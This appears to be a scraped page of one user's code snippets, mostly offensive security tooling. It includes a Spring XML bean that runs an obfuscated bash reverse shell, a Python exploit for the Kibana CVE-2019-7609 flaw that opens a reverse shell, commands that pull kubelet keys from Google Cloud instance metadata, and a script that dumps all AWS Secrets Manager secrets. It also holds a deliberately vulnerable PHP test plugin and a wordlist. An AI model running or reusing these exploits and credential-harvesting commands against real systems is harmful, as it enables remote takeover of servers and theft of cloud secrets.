_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
View phpobject.php
<?php | |
/* | |
Plugin Name: PHP Object Injection Test | |
Plugin URI: https://www.pluginvulnerabilities.com/ | |
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized. | |
Version: 1.0 | |
Author: White Fir Design | |
Author URI: https://www.pluginvulnerabilities.com/ | |
License: GPLv2 |
View exploit.xml
<?xml version="1.0" encoding="UTF-8" ?> | |
<beans xmlns="http://www.springframework.org/schema/beans" | |
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> | |
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> | |
<constructor-arg> | |
<list> | |
<value>bash</value> | |
<value>-c</value> | |
<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value> |
View wp-scan.md
View gce-to-master.txt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt | |
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key | |
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt |
View secrets-dump.sh
#!/bin/bash | |
for sec in `aws secretsmanager list-secrets | jq -r '.SecretList[].Name'`; do | |
aws secretsmanager get-secret-value --secret-id $sec | |
done |
View elastic-juice.sh
#!/bin/bash | |
for env in `aws elasticbeanstalk describe-environments | jq -r '.Environments[].EnvironmentName'`; do | |
aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail | |
done |
View convert.sh
#!/bin/bash | |
for picture in *.webp ; do | |
new=$(echo $picture | sed 's/\.[^.]*$//') | |
dwebp $picture -o $new.png | |
done |
View CVE-2019-7609.py
import requests | |
session = requests.Session() | |
cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1" | |
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}" | |
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"} | |
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers) | |
print("Status code: %i" % response.status_code) |
View wordlist.txt
This file has been truncated, but you can view the full file.
20-ev-allgemein | |
20-years | |
200 | |
2000 | |
20000719 | |
2001 | |
2001cc | |
2002 | |
2003 |
View removejobs.sh
#!/bin/bash | |
for job in `cat $1`; do | |
curl -XPOST https://api.binaryedge.io/v1/tasks/$job/revoke -H 'X-Token:YOURBINARYEDGETOKEN' | |
done |
NewerOlder